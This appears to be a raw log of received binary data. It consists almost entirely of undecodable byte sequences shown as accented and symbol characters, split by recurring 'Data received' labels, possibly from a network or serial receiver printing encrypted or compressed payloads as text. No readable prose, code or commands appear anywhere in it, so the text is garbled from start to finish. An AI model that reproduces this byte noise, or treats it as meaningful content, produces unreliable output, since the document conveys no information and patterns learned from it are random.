Ò˜ä²èÍ潜‰)%ÄA¯XÍu“m2ãR6¥hêcí5AªjÂÕXj†>¼ÏèIʁ‘¦nzó(]“MXk#-䜚yQöpFR@µK>Ú¡Òô»ýG^÷iíðªìºÍsY7ª ‘¸d2À l–ži=ì¼q°™‘Xé»;‚¦(Âr'nÅÄŒùo©Ð`ë%yépÄðw«ÖgCN¨>bvÜÃ?õX­ o侟`óÈ @ÇlY{q“mGºA=‚/}¶w™Ç’|ÆÙé´JD¦K…c€úøš·dß Äá¯Öӕ©ÅÛ\lõ?JòW²^bm«±a<¸øN§Ð-4â• A'8 Ñ1Q¡šã0òWÆËLø}ØIMÆ–¶±"R(¤ûŽ›EìÕõžl{ªn|P÷ª¯ì#¼^S¦¾”SkôO½H Yì?J˜0
Data received ašÑç?ˆ«Æ´4¼§\¤ŠDš WÀÃ-?žF=øï¿Ò¾„i ÊßC<Â1¼…Eö'ËJeK¨ º¯‰*¸t.Knesã BVعó—0ùÈP\ð÷~wâr²\þ[x;¸•xR‹¥X•Ó Þ:iŤmÛݦƪÒþv ’é¹AÍAù5qëÒ: Ò¼Uc»]N®ˆ…2Íì`¯a¯u"8¢’Pk,ύ)™ êO¡¥R¨ê­BÆú¦ùÚKdã[ ˜ڝ)) L‡„HÕ<ûN‘XYǂÐrÊ"ž('šŠ\ Rj_1³àP²©ÁŒp˜Ÿ³1˃ø]0<úVbæ]ò¡òǷ؁¥¸ŠþÚ Ë.XÇ~ÿ:*âLÿôárÈÅ&?ÈÃN'™ÿ²UW,¸ÉùßÉ NYl«~¸/ìÎ΄>[”<—Hƒö³Ò&žgr]«ü(xÚæõȝ4j=¯9 $³ÝK:Hmÿî|‰9þðbÆ[¤±Ì‰Ê¥eÚiªÞ·ùÊÂKŠ+bǓµ·ãÊBÆ.°ÿÓæ–с®^ÂRYùþáÿ݉ºû!ýhŽB½IIÏÖaW:ÊjˆY§Ç!ï¬ËÁ$õ7¥ñLŽâZrÎÂ&ž*L͎®K*=ð'T…\T®ªæá0z•» ıýë†0å§0¼RíôÏR ɨˆº'àƒœK®¤Ž¤%Xس¬Aª%·nP|*¹M›¬zºtî €ù,Öøxn wb®C§*ãë§='´†c€Ó(‘!œ@uˆ÷琘›òޕ\†•Ýᶰ«6‹ïl÷bpÈËßö!nŠðˆÅÿ¹·À V›/šñV5Äp™>„4y}ºÂÉ G˜TÄ8Ö}7W*’ãÆâҍŌÆpþ4¨_ü€ÅïÖ»ƒ§¹©ÛdY§LÁµUR!fŒ¾›šZ“wÀPÖ¿>k8—hÖf±2ÿÛ>mI/cïÏXÜ?2h÷4Ÿ¾~s(ÏHícM2PäCr«,ˆDyݏ½ëž‚p!£a=wYØC ᵃUB¨ô ®#ˆºLßv^ÄÎã‰d®»5|ŠhôÜréŒÐÔäÈAé°±N>]™‹GE„K&!ðlËQ¶YÖº<Vjiv’1E.žãºlùe83‰»=eO,âº&5 ÎA¿nÞ.¸0òb0µPÌ$-ŒÎ‚ûȳ–ÐP—½Ú½i¡77³\‚ì”ôtPXž)Ñ;kùw#Ï® $šëU€«û×ø˂Iouu¼+ð€Š`òš²]µCÏ6Üñ )€-…r vúÎejQ¯™ ¢™ÂÍ:~‘6‹!¶‚g’ò\Eÿqp°c-‰öò6NÕ"ê°K^7Zz)ußjÞmŪ²éunE;ê¼ßMœéŒ€zɜ¡ô´Kry`ɪÿ·Á´” "“ØÕ Åþ¹Ñw¡pڋ?…ü]cñëuBž`D¹;A¾IÍÅÌúÏ3ˆÄ 3‘úMxhց¶QDuœë#@‚zò±Lb7iq†Tï¶+eù?g¦ÉêvxÏQiÕc3²îðʕ)ÏfþßkzVµ/&¥¡ŸºËT@9 iÏe_Õ"^ç?UGU:ù#^0àm¾–ú`G™†ß1HŸ0v>ÕäÜî‚VõAvY„¦ŸóZÑôEžˆT±(R»*Ú\ ‘ˆ¥nh铯/#—³ À©§Ñ(y(íª§^1ñÆ~ÿÅéÏñéHš_HuÈ`ÜjêÓO <ÎûQW¨˜:9˜ñX#¨D”‡°W^´ª çmH—`o¦sš,«Ÿ:¢0Ì1Æctzö¸Ç
Data received ¤¢{©ÃL¿dwÚÁ¬f!˜ÈÒÏ¥Bó‹ «±Ïu]¹ØFM€ xÚÑò?É00õÉT(ÃIDÑ7Ð8&1!U#±öü+)uGÞԈË‘_lÙã©;¬uÂRhº›‹sÁbF3ùt ‡bEÕ¡ˆÓ€^WŒáí­vA²dw2µ¶fn÷ Kkó¹Z<¡ãSÂïé돳)ôoúB—D[çÚ;ÃgØC­J—ïF¢‹úŠ U[ü§ÃºôT zN¨²þ`xE‹†т–U÷GÛ¸ò։}°÷¶ó+6¶'ßûÐïAÃM ({=µ˜7H™§áMî LÙÂäC€Æ×ø£}fî*sîr¿Áíñ‘–È¿ígz“ÖÆß:ˆüÔ@QÂÝY f]ýÊTUªý—ly,m½¨º"ÏqI_üw¨* ³ @¨íM[QSrËáí¼¿í¿¸‰bsžxüŠ¬D[­L€°¤HoÙ&2!pĵ0¶Yn5¥OM ܸªY÷Ö^¨$GIh¥ëúm}u¬ò8w4º~øú?øîªï˜Ë"Þÿí"³eôAó!ÑKñ¿=8DÔ¾Ú5coíŠ'0ø³2sZBԟ¼ÚƒÀ-Îø……3”f À†5 Rt€“¢Cõ0Oøjvž:¢>¥iôãè¡ùS2µ» ³ b'셣á¸\­f`=kéɦó²?ʎù|W‰¨©Ì¬¡]íÝjy´§±Î(M)`–L•,¤’Òxåä;Š¸U]ÿtÞF°Þɜ“káìx$U3JK¹–AÃ3¢ú^†©Ã*ü—$h€q«\uˆq?ÅròVݜ|‡þÌKð“çû~Ý¿õ%ôöä¯Ýy'vâc-€[pxNTò»hÄ÷Å^*°„´Ãلe,lG†Ê=×È  3<Áî‚ëÕ-ÂDî·)c åsýjr‘ƒ8ªÕ؁ï.Àw¤ñyÍOƒ¢­%õ†Æ©14°´´5ÁÊÉ@âÉéÀ)aڬ­áÒ¢3…4ýä21Vz~P d‘Ø:ƒ áÒò HÑ~aöI³– û'楨®Ölȗ8-qšqBöI ΉfÁ¦€þWCü4nDÕ= õ»:Õ­·’‘Ž¾Áö°]-“.•…““œoS[Ek´Á¨û¢2™—óÁžØS$—ŸG‘„Ÿç™8Üڊ¤¨? »gaR¤Ò”#™!œæUp¿IÖ¦ÓþcEf"V¡qþ²ÏéUsÓæqÂ8º^_Tyü³ã˜7)˜=ö'"~æÎî¤ ? ú²g°&ƒdŽðyúƒïy}›ã j¬…äÿlÿf ˆj“¯”ðNގÀRÃÑ¢qÖ¨¢qk" 'Ã*¿‡ÍËø‡(‡GßAû¡\twš)ÉÓêmÒXÇËL™ñú6ybD :Hr³h< ]gû/ Œ>Hƒî¶YÙmm$݇FÝV3Ù(àèqqr¶de"?¤r *õÁ²رà>ñÃØ^ ¦¾Žñ©0“2^×;u3To,v"@[—·?9çì4¿A_ÁÆlÂö>|EDwOÈ0Lzd'¹®ëÅ-\~¸:$ÝRb,[¦³”´@XDèœWQƒ|1VËVM5° ®ùW?Ec_“P׬]÷0Êo¦=U8m/&ifÓv~ dPüƊ²‘8XLݹ§|UeÄ*ěòò|þ«÷mûy¦òz”¦Ý°N,7Ça¡Ûüšrà·>x8_¹å“ý×HGÇØgYê~?öðû) Í*…íðI¬Î-ñ¬“#p¢Ö
Data received ´‰c)¡6Ø¿&aŒ> ~™7žž/y¥àÁ›¹ËzÚð…I‹`K'ÌMN«A6ƒÚåP'œ½ÎYB~ct,ðwÌ ÷¶ñ‚¯›U êԁ3èÁ6 h4T•ºZ Œ•Ž(æè[1;;SÖ?*,:Êû*Üö]WÎßXÕ_³¢¯¦ NÞlâ7£åõ“&kF‹#%+’tûa><á ÏÏJ( n×âÿ͎Vq÷êÓ9#dÜô8)¡¦1¶E³Eþd.&&˞‹–z™®’x½‚6Ý}kŽõÁû–"§«À(h&RŒÁýŠaÀä ‰-”<çðJt¹ø‹ø?qÑh«H|ê>SLv*A¦º%²3®&?½'ÕàÑúP¢S ûöN+ñtHž/pDð¤,tœgŒºˆÞÂ1…öBÅÉr7ßR79;ÔQMÐná—A #!'pÆŸ#Pö¼SCä IöÆÔª`²:cõQïrQZCçòº£*2¢‘—1=œ äÂyL9”Òw­Y âY¼¢°Ù©¶.lžªËG Ø qWÀW²ì=½ ¡;ɕv`<ŠH9 6•öGû+–““›) o|¡ÙfíñN5d£p&q_gÁ™£e¦)ZÁ„ÓÜ ¿‡ExtW>Õ/ 'ԌiÞ« Fä5^ÃLaž` ÔÆ['eð€Ò”`KvЍèY@éݓϯ ·¯“4­ 8ڎÿa™d1£åfÿhP)lÚ¤0~DƒdÈdERõ¼"<÷öàQ®à=¾5CàžG%<†™‘ÚYŸ7ÊæÑóqët ”³Oâ;]+JÁp#½Ÿš‚;oV æÉÅ©Îý¾-ÁV¹h3±C®<Îc¬ªõ.¤®vWYT;ê ë™Ô^S?øÍYK-lÒJAy-»’C.–D÷YgÓGÎØBò+z®èõÝvÚ¤öõJ(ïZ}Ö*o¶ì^¼ás nRžS ñ­+¹E¶xZŽWtD™†~™—/´]>>±G[Í\õ`ÍÓԕº÷ÿÓÿŒ·Ëoàé¼ï%¯ _Ö*õÑLy)Jzµ8z“î&d:7×+¤šº\Ť|ô+7%¤ 8GÂ׍!G@ÑÁôÿÛ1k¾%cZ[՗¸BٛŠ/*mã‚JR ¡Å‡âóî]Úæf‰e[^-ۂÞ€¢!1 g%èÈð'j£ŠÄÙç„ιP'ŋ\“ÒagÓâ\Y~•¸_cŒ;÷å/ºa(>’´óÉIÀaŸ V[`O˜ðð#yªoéÃRû*:âb‰‡/r /dï~WS*ž/cޛ (ÄJôåMÿt_K PÔ°‰õ)Å,¹ ¦Fæ0`¶l¼jèÊ°Õ$öìÇ"ÝSvø@0ŸÀ*è!Ϧ-õ“Ò™/=d³‡*’£Q˜YÌ֜C z[¶þƒóÊ rzx0S7íPWmCƒO‘÷ŒýVv•X†­‘ææ¿`cÞÓÝä»þ«…Fóö¦o‹ZzñëÕI§Œ»ôxx?Em¾îïiÖm¢Ž—Þ²CÆõòÍÓ؅ ¼JtŽÀqü\ËuKð¡7žn1¹LÈ1Úø™Gýf#íǒMf¹D«ä…s(üV?҅3nnå÷v†)l‰·S1ç'KžÉó[Væ+Ž^wچê-ª’žaèØÖ½äŬÈ#ýK‰ËYÄ©‘Ó&@¾rí´²Âû͑›@^£©1WËlV‘§tÕ,()K×V¬mßu6;"û•fé·™f~ðudkŒ=ûà÷+–n_}Xúp”u¦ŽÔÃm§ŒJÊúûDºú[i¾E
Data received Þ`ïïZvRJùbþåJ»ˆrEã›Ç~£Ý7¤½·;Дý¸˜=DDâþ/BæY„Æ8o¯%ðAb ®ËÂÍ&Íà  YÃ/ÖR˜EB–t¶жSc{¬ð—™ýðº‰Ò©“Ú¢èÜçuâ™Î/cSUSCp©™Ù¾Z)Ö\ #;)ÿbýæ´yù/ÊÓ²š¢(þ’9/öˆœqø­ AJ¸æãYqp¤#Và {¤QÎ@Tn êûä×ÞjÀŠ°Ø«âMCŽ5®xQSMfG1â]è¾ù•#3Gc¤òÈÎů’‚gǜ´uñœ?飍”\²V¾ãž¾QL› ¶ù‘+¤ñ»l¯H|{û—öÒRû/ÿpJVyjêfÔxܚy”·Pý ȩ׹ÜýqöB/ªõRT/5 µÛ¸—3‘†gß° Ý¬Z3 ™ê97u,¢ ֌LôÜrñäú©{ô¼ZžO ×_Ï5èöÁ@Wu88E¼LET29Á!Š›1›%J& LuƒÙ:„,8n6ê¿ fqm_!–bB 6…0ÂÄ^ÖûßìÓÏ+ÛœüW@‚ݵáÏ°pÊ]I<s¨ð ?;'+èAùìÇ ¯åP³ÇcBΐÿ¤ö|» Ø…~£8p+³˜îG‡Ó„ñ·ëÌ*aäÕªƒ$; ÅQÃe@½ì2qJ—%7vo²ÝDŸ;ü«E]r6zHÏ¥Ìñ-·Å v#årª=¶ÝwûH¢//8îI¢ãˆf2ò„Öeä$BúÎÝ`ëQ©GiÎÁ&¤5<jcËQu[éÅkŸh¡m^•#}±Ý1QŒ¹qñ¼=óö¹ÇVn-c[„(…í8íÄ®ßRO‘Äó¼þ;ú)<– ±!ªæ'Ûï4¿š1UJ!0f•&\қòçqZ;‰nq…±1{¶Iúv¶O`åÎqhõ­Ô:É5Ø;àéë/€ã–Å¿y>…†.¡„‡–¹O_x”徏«`ñqšV/4ŽÂ8ØÂX5µƒ<û ¨Â'”^^È’aՕؘ]?—â/¢ °‘ð@` ö*6®ØÙF4Et6÷õWqKÄGƒÐkɍIéyOÇ­«8žqe6ÁGq•_–ƒdY†%»=‰qÍI ޚÜ0O(‹1«¹?ý f¼^ГÆ™1SƝã\Õ -ñöM…⺋™šý+»`1³­"Žë/£*²ãڌâ9•Eí° B`™@Y”}†?³x¢ÒV›HìBNÈc â2—Û…Ø:z+»1"Žb›´±& eYµÒøá#Ó6¢†WÞ$n¼C¶éÈ5?oùhGo¾(nÁ¸ÿ9]/”ýŸn—ÆÕ£â\ì*O]E!ÐQVß=`v®½Ýæ* ~ ¸Dò¤lnYn£*õCÊù`gJ’­Õ”GÈ«myi×ևž ÷ì.âøåL|²=IÆõ»ÃÂQn¿ýNæ6ƒ!ñ4}/ž Lã=ÇMPâx!¡1>ZyæBŠ¬fê^‘ž śOâÛu¼|Ɛ‰š!§TàÆÑG ƒ5Ñ&cãG?.ym²a%5.2T¢%¯ÌÕbJÅÝt žá*æšjü„Ýo¼0 NˆÕd[@Ž’Ã-?Fq–ï-Y²¼R¿ —dµ •ý }ÜÛIa×Yz{ô(Ä%Óý‰ú^EdºS‡xw‹§³“÷±~¯!_0°mIæ yœñ¼qC‚š—îíEUy6mô¦=ð~s@Þ§ã±È¶xTnFÂÚÚD&Ã/[Ñ·ìÎ
Data received {o;$¿H(ݦw/ӔyÏÎGQõ1ºëx\ú!ê¦oñŠ©YíîiKЬM2¥ lGåÜiÁXiN쾎FCwy\¹ ø6,Íl¾:ëržÕuüîÙTöMYÅþ\¢ô"„³éŒ+ˆT’cWÐj˜¨¯ËÅ+»’›ˆŒÇÙ!š× w)aç†7#„~Qû2u]FV?‹™Xèay×ónmŽ›zL«3Í€ •‰xýáÏC÷õñœÎIY%ã®æST%Âُ(B¢²ç®ƒ¥uëó ªN”½Ý¢òµ’Y@•§á¸ma.P8G[ g’jdބ'ñÔØ>YlN+z®‚ö;\8Ö­Æï‘;' |ŒãAÀosçõcϱvéTðPû«Š0¿ùø¯RfDo–µ×/Ëîݜ—‡ùj¡i³"é*P…yN–adaCýŸÀª–N¬èÑwMˆÍRvRQÓYÉ&µþ2[5ÑP¬ÇŽÚÛâç0²–{ˆ7Ñ^éã“òc÷Ž~ÉÐÄ»&Z‘gÿôµíúô:L™“áú¡§ÏÚCý…êÏ' Õⲑ }ÄàˆZ[aXʅ™SKZâñ³ÿ”(£"˜rÞ8‡UÜs›z¥íŽVösŽjpÈVڀŽ‡$·xñ8W/²òãͲÑiÁòà,ÙL'+l_Ò§’–q†ºÀÉ1mÍB7è©ÛþՒ¾[Š&xÇ½ƒñ¢šmJÔǛ'&âyŸ×ã(êbI5ٟ¸`Ö'š|u×c…Á²¡™àlg®1©¬ØÇ3Œ»g_ÝÔÂó³æþ;uA›ÞT\'´“õ‘Û«á‡Sþh hY¿¶™7#ÏK¼I·–€Pë\¼Ó5 R8prûÀÁŒª¾Ñ ?píeµìËÿñh‚#¦âu_‘$tµ²ÿ¯öÖ¶Z}äõó ì%~nmf雽FT@|6«­ÕômÑ Ê<TBfP/ÌCe|náîÛ²Éÿð¿ønúN¹»:Z…³${Z—Ü'³.¿mó½YúJ¯[Å*[W隕æÑÛW*‡L¬íÇêM”$À»)t´„|¨Š"Ûß"L²êùÏD]•zh‰ê›cLó7S[¬›Ô„g¤ÞË­¸#RU2 ÓÁuƒ4^]rû"‘7ί)Lc1S 0ÞiCáߖ…Ý]Á%uY’°~¤¥Ð ”¹AÇÃESKîlìßÓIà©b`Òû¢ÔwѺ'MØ´Ú',{ª‡Hõ+rO'ö]j¿'݄Ëxi¦s,VQ¼„Ší†êN¶¯³ ÷¹×MEùï÷ƒôЀi†Ù=Üe)¼LFG{ÿÝEbÀ¥€âM&[Z(8$€ ½µýÑkšasâQä,ÕÍqnŒ)v4gÒ¡í,ÏP®n†Ì ¹·åʦoO©©ÌîÙ÷X^PF¶¦€¶.þ¼~b¢ê CÀ´e=2Fl„úuAFc (û×Ïö4©Žs¥¡+7Aœ8æ¨> aŠÂ ua‡;³—EÅò( ‹²JHÓ·QO¡Ç¾êÈ,glùnjQ46“­}[Ú§&é9¯ýüí›Tõ! -)cI{=W6¹½ñø– •ÕxÇø:¡:LõÛÑӈ@… Gü^+à[™I‘1‰cɜ¬QkI—Ÿ§|sÚ>SAù³y‚Ô-rDø(R–DjX"@šm2L‰IÐX­ÆóaW:Kgø€Z>O€&³T¦g‘ª“áÿ‚ ró1EÀUÝ.ÄIú¢‚ZÄFÍï¨gzàhaÞç`ËC j¿ºmRs`ò!A¾7ÐN#¯‰®´ìo
Data received µ[M›Ô7¿:¶V¹e‚ßy5<9T»{ߊːUÔÈ°C6¥n\jl@»â]àrV²\¯‰Wð®%o@¹nŠaó¯N Ød •âÙñ:Ž¯¡ÔDÄã 3Ã~¤.nUBâs惮~4_.¿®WëM®ø[D¶ÃJIíá°#G"^Wrø˜nòp¦EcN„+µM÷ə(ýZ~°eP?ËIÈló"ocɜa‹™ùL¤´µ‡šKZ0ÓQLY#Ó¦ |óQÞõQc—¨ÐM%É[‚‡ô A˜À醙í ~Ü=*0h%`Ôoļ(Ò³^¥»·†… L´5¨:ÂAl7D½DKâÅÎ%8S ¹ýƒìŒO»nŒ¤SF•H6ޕӎ#cAä \™y«CMŽIGïFjuïfÆ'…ºÇ ͕mnÉUš#¢Zß·@l½1ü:¸Îò›o;žÔ¤ÇwIï¤-ýšØFÎs«|4¢j÷>7” ³Uú{/ÉàÖÕMÑyِ½p£ö­ç%ˆ6àdµ»†Þ™CùµIü%Õ ÓN®Ëv4I¬‹§‹ì? õý8‚6˜ ·ú¶*Êe¤À…Ýeß 7;¡ª«ë{/.5هèȯÖÚªê5[AOÍ+rí*<lUËx°÷5U˜Cͪ&ãíæ>HñX(†ë÷Q6±{12êEˆÒdé½2=ñOXۑ4‘פV†Íþ±Õ¼ë*Ð_ac Cn蚎Á97‡|tÆ^ñkÕÔjòÿ,úN‘i¥2/˜”ÈÎÿþ“ø’JÌÞ|¤ìmŸ4¯îì ÷ncƒ2¥©¶:Aë^”‰7pTèo/‡Ւ‡ø ȕ4ôÁ{?¶yäZ挈ål“#?4È¿Em÷˜º„t~—i®!—…íf}–)¯ØÅàåXʢ內Íí ®¿–çetþMD°Žøðúÿ|õ›8ûœ–Žj1ýÓ}°ÔWîä‡*&Ú÷¬zi4¤7ô0qP%ÂÁœWنËXÁÑâA±sõÉþ3vï7Œ­<X¸3õo)$Ÿ›»FUï¬1!YÐwÉËixO¶a'–›‹¤Ó*ù흦E_Ôç2Tõ̌yXNv3g'É5dø5­bš]Ø{cLTØ LP99»5÷ƒ0OP}qÓbkj MK»{EҗôÏå<EϚd(ԖòÙ} -©2›\CÞ`T5α@vä¢JàPßع7­?65¤â|0օª<½ÔŸ½2O¥ŠŠ‘0¾?a†à›€PÖt9Ò*­{¿¸ÓÅ4¿@ò¢…”»ª½üDžPšà–kї>ý®±øW83iÉG«/<&O_?§™E`-ïÙ㽁†èÿ()î^ùR/ÅÅUºRJŸN¦«XŽ•Œ}š£;³‡b軉ÓFnç8bŠšY¨É)o|íù.¸ënŠ·_¹ðæjëyÅh”4€RùèÕz:¾ÿ'³Z¡yÁ™òÂ)ä¶Ô•ÜL#²ô*«¦çš’«•Æ‰×gà›)E- l84!s{îi>´óOAÏÍ 2êMãµ´ÿKv`C— ç\– X姴'Êá{וP҂ Z~Õ,d?°":¿ L…nxvtvs³K@?¢RHáxáÀD*Èh_çhqŠ6ít';ÞÞ[@tQ»ˆýdyô³6€ÿ–ÍM˜§ ä‹Ñߚҙ’X!;Ú<âAÒÕßÐÈ -ì+kÚFš\›®¸ñjü…Ì3úÂJs H¼Rœ‰Úþ½c7ϵøӖÿú\/ù.i pÐù
Data received P
Data received SƒfN;K…zÔXaz*ðgUò×<M›Y %Ö3Þ°7õrz¸s€‘mÞaßÛD©gò,WØ¥OHš6VLÕB7RaE«0dÂíõ󻴷г^¦½QqGlO?ò$À‚j]¾®²µ°^z¸ó( ?'JJ©r• ²?_XM$¾ð°gë‘;1¤wGZ_l»ÕÛx¿R8Q~å4Œ{ð— rÈ6ßÅpáÄÁQŒb¤[šy¡Ò^šÍo%Gf-þ€¾Ï“8šð%ݔÆÅè¯Ù3! œvÉÞØíÅ©Ÿ?ßSaEŒ~"¬^±‘ŸÌ…Ы“Sìù¦¤Î…®øRœïõ»`ïáEO…lÌä¯Á ¯ÑÙฮ%8F­ÞR\ŠÐói¶Ú%Uµ mU99Õä™WM±Äå`}ŽžÐ!^[ké{bUS–.M1z¼Œrpi77d{‰Õö‡|ÇOÛrQe0Ü#=_ÒJl,ðE‘•cÓ@镏5TtŠ<Ì”ú?+ÏݵFªÝ:ѐž:ºŽès°¼ëûíFU8·2ê÷LŸ÷]#[¸Á{&M (Î{ ‚+@S),~G[ÍëÔ°«$5½?ÇC=iLÏ¡¸ªëW¥Â1¯öÄ øc–Þ4!2 Ão¨­!ôH"¡àHãj‡ 3<-q W Z§æÅ[‹‚,ƒD<{°èóðC–‡Á&§rq™} }_¶|TÙÄk¸mßA™æCÅ °u7d³¿#ݺ\\'S®Ùü2P«Ze iIá6Y\„ngB2ÔJ ¨àþéÎ5ÐEª}•Ás•„ºi¡ÙÆå@ê_àÁ²Ù‚W;²xQD ƒË¦ù/¦“ N¼à=›gè먲ÎúÇÿð|“÷cµ »Û›ø¹g%Â$€®´©25á”qñßWqŒ ­sGúíä1[™¥°Åw\Æa«ˆÈTÈX²Ü ™E«—T'B¸â5ú€.@~Zí$Lû±$XÏd˜ì•FHÄ©òŒ­ÄfÁ}4"Qt'Tî6ÀØU +vb¡#fëÏÌ÷1w»Ë§&4Ðûäˆ À:Ûz9}¯k]NJ»D&’D)MrÄÃXSÿžÎ±tX)Œ”±¸ó‰l£L?çÈsÚÒlÐSAmùâ³cg"¡H…:ŠGC¥ *¿yüîF±€Rþ6È?­ÿûYÍwßÞ¯ésrxMIh¾€–Ò‡ßiMwöÁh†HÒ²aF]öSò-Mø=´Ñ\ªq÷•ô|e»œí(Ë¢qƒ“€Í“]|#䰣ʮ:‘zVë;Ô !”É †Éːøþgê>øåf i˜ä?Ђ§ÕÕ _ 2 <ž!ê:Žl›|7E¨›’Qž´8—­JÒ EòJý”Èo¦nuá‡L½ŽʕsA¡’™uüؚ2•êk„¼g³ÿ¿¶ÚǦ #¥ i’<µFLdÈ%zY™ª¥­uêW]9¾¡r¥vM—ÁæÜ0É<½ïCË¡I£Cà fJ†B–IasáL1æ^øIÌº¹õÉÿ3¢–dǁý@7/ú6ÂKpÏôvÊú„¶ÊrÒFŠÆúÀͯô9¢¢Þ†Üs|ˆ'¿×dl$HÒdùf¹"iÄß͏vVRþ¥up¹a'k°<*ngº€yêñ-4|ǼNºŠ°YÐef—Âqxð‚jæ&œs™ä|/@ì«&9öñÛúpyºÔç‘bãâÙº·¡vì_Áê_ìûwñ£¼ÎË[oƒ‚/s
Data received z’I¦èí­™ú/h°^d½2o…<›èï‚XÑ %šú5/3‡Üšl/&É>]aszûƒLyj9~1'bÕeO’-"vy.!€çœÁ¾Èeî]}yµ5ÅH‘€=ÑFٗ‡ è€eú±³ÈCO9/‘¬fê³ñÐBq‡Rg.ñ0£ üÓfõw‘YxÔÀ2 Šçy÷2Ìù6ÿ3n-Àƒ>õfÊm9‹~ڌîo4Ìû‹2ýl5ª¥GæäN[Ñî©zT‹„™Hü®Ú–¤¢ŽMIîJ.¤ —ÊH§ÈldÔ­ù m|¦0²í®¶R­Ädà²Ïýq’ƒÀ^Réù[ìü5ß®VNú•$hÙ>iíÏÞ%eg…‡0ßýßÍ­¾‚ö[3$&¦ßñ¸\JäÝûY­¡ñéÒ¼—‘#3\[ûòÛÙ ù1$yz>Ÿí> bœ]¦Ùtb+¢üÄ8§"f„ùŒcm ¦þAÅC¦…"m8Ö®ûӏÇu‹%ò•¦?Aj ANIª•F0šfvû×µâ1 Qi7b­z c;ä$Á•¡ÆèýYjš×¢=i‘õ™Ý8EÁ”à y8`„}Ô12;*Ká‡þí°Azþ¸íúpÙè˛ïÁýˆtÜÅÎ ¬à™Ò¤þd쓠ÏmîíM{“ ㉫ÿx|(/Þ_é4—ëøûíÁ/!f¿ ¤èɤ9vÉÂwÇýâQ®çl˜•«|ŠSҜvµ/u*ò¼£¦‡ƒ×шÌĀ'Ò ôcTMQ„ûçó£Ä®.p7¥Vsà LûouXð}‘Ëb('qÒ¾)ô8ã‹$¨¨uք©/š«Xù)x4‚¾ò4ŠÀXL„àiçM~{iþ( §‘K8U¦?Eup¬Ë±FeŒ?áL7Å*­©DßÕ&wm.v¿ã…êË0±Gªfšt‹F˜ò­ÀôB$ôåBZªû ò|¿´§áF"vê löˆ˜þÔã‘òKÀh8,+Ìs—Ze„­Ì­ÌJäKú=º=C±!¯Ÿi¤F‡dhHAÞipN£ì±+Ë'×Baµ˜ÞŒMm}ù|žLàµâL¢’PN÷”žŽØ´ÉæveËÝý·1ŸŠûã†™kŒV㚆JùP C)¿'‘4üqº'“V»ÔA4*y×$E FĤ7G­]Ô*JM&ùZ*§•(qksêTZ“Ò4Œð(žªv «ùmIŽ(-òË70ƒµ{¸™É5wf2}z º‰nn—`æ?¨d(ÊG1 ÊW æÔ:‰®W]ÒZ”ÈG,íٚDl(ü ¬¯*’kT0¢=Ö{š k=Q/ Ch ÷R4cŸ Ëø«K¿Éü^…Y °£ù6­Ó ¡¡¨øŠ =žÙz•”@/ Ãp£ "à ÞÍnpß ì½é²ìlrÍèBÞ×»FVëÊíÿ[fqåþUÎýÞÕYY}ÚñÒ„]IP^b/¶7;ˆN7Ê¢‹zä¡`—9ôQý‘”Ü6áܳÔƍå 3ÓW47þ4LëFXX¼Ð§ÓÎÃy £RÅòñG®ò~5à1Cv X÷xàSd¼]Õãx~ä4° ü¤†£}™¼D /¡©ß²GñIUÀ›bP ^Òw$iLر ›5SŒ_þ[HÞíBF楈Y}ï›>GY GѧmøÛTnš_ Ëýçë‘LAݍj§õ…»fïÓÊJ2Ðzc­V1!ƒ­ŸßÍ­âm7 ðE—ži\¤vïP”–ƒŒÐôº„C{ž+
Data received a0ØHå~RÎ#-ÕàÏ­CkÝP¨ #f`†’ä,Ò,µ=2ŽW¢ðӃ›ûΤ5}þÅ/4&L6tµŒ²wyچSø•9úŠÎu Ĝ­à{Šz«B{â^iÅîq3úÞ$‰8¯có8.ì¨a±_¤+[‘8í}án%þd"ÜÔÒÓH”TJ¡ýÒ-„Õ¡*,з­nš~ PÎcéû9ë%Ø(¶™Ÿ  ¢àU .lËeçPô4ˆõèc‚!Ë7F ê,±XÃj”ן3ø4¾ûaÎص2š>!uC1ZeÑ1»½«Œ/ !áæõMJŸhþíÌsÜ£”i}ÛHûñ(PR@O,÷„éÈR¯‘¡ÄÀÜ.œå§ÕÁÁ¸M8 ph[MN›®4éⵆ‰ÕëŸØDÑù¥rv´ ïaè>õÛh,¿,æ~1ôîTüˆC›W¸²+úºß†zKè\š:×xæIÛË£õÚãzRæ:#´+˜?9•‰KBã×[±t*-â$ßîºðý¯z°2Mw»'ï+¾kÎj ͎‹¾„F‰6À¯t–ȳüý½³1”(„km=¡ñ+Œ)B+厐{ë«£ýР˜u.å´½8#™àZ|GÂ#E(1«­G>õŚóßxwöOµŸPË8T3R߉#¤]©®oþré u®-OW]v«[„GÂ{¹[ü?Ô·éÿBì[÷Տ4ãáTÞk#Ü"úW‰ë±o5 FäZ¯Áf†DŸ›øTwN„ŠAiAãB(qûÁ°&ëý£w!@2HƽäFÒ'ônÎêÉÐlÑ~Œ¯f…#èuЩá'é^aÎËÉåpþšpIEvFm^èª2ó½óÝ#Æ0'/‚.D–j^{L…ñ¥zxŌŽñEÏa+ó]ÿçd–ƒð탿ƒnoÄY#¯Za@(Ú+ªª¬ähÀ#C)eÔûSc}egØýpœÉ»‡Ïû.¸('~K¸ÑŸ¿bDåç}Kñîg‚”wÞѓ9%UÓ͋£Q>þ᛻Ö`º²ÂJ;õH…›MªÃ¼¸^ø JAšEl ÖV-,-¢6<ÃD~^] &-dñˆ5·“Ö¡ÊðÂÐV-ù¶ØZñ9g)Ýñ휝ì±Ær€·c8 9+sn.Øn,;‡HÂ_C«.ga?‹\;Q/8àÁͅuvÌÀb´D~9¶„‹†­€ «Òÿ}ˆsº\äiñEçoïK¨„/™ç…ŒµEt_jLÉxb~vö× ãE° å»àè¡QÞ2Ý#XY²çníªøqŸ‚’î\a¯2<‚„‘k[Ó\¦ô èÊ¿W™²Ž\˜qu?V¾Ç#hÓÛº]?ЇٺÕڗÔeãë .ùP`¶Ÿþº€§·ÃçqyÖÅ»çfá7™g€úõú7-‰à–u%p½žü2¼Å&œ´™ƒ7ÇÓÖÇÿì¼ÉÚì@›3U ³ô $Õ+‚Bb®°+âô &Àc[ïÅyD\:‹góì2•d>KÔ²p±SnµSî6 XÙ? žýiIäÚ¢7w#Câ@N¿ã¦ÎÆ$m § ij ÙÜ´M³r,ùì¦>äþ&' ÑÜ Üè³®U)&0à£zIuƒlËYƒ^¬€q,ööÛiÌWJ0|~…|æÝQc‚)Ðca¤ øËZõü]î#wû÷*³<ýñ¼‚$à$zÍBÙPVÖ0¿åF£,@|ŸæQ)DŒð¦øËÊé´Uu†õgTuýÄèîá€ðÍp²IG$ÙilbèQÔ
